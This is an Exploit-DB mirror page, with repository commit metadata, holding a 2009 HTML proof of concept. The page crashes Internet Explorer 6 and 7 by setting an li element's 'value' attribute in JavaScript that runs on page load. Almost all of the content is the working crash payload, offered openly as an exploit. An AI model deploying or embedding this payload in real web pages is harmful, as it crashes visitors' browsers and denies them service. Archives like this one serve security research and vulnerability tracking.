exploit-db-mirror/exploits/windows/dos/9455.html
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

24 lines
No EOL
396 B
HTML

<html>
<head>
<title> Irfan Asrar</title>
</head>
<body onload="c()">
Set Attribute Crash : Tested with IE7 Vista
IE6 XP2
IE6 XP3
<script type="text/javascript">
function c() {
var li = document.createElement("li");
li.setAttribute("value", "1");
li.value = "1";
}
</script>
</body>
</html>
# milw0rm.com [2009-08-18]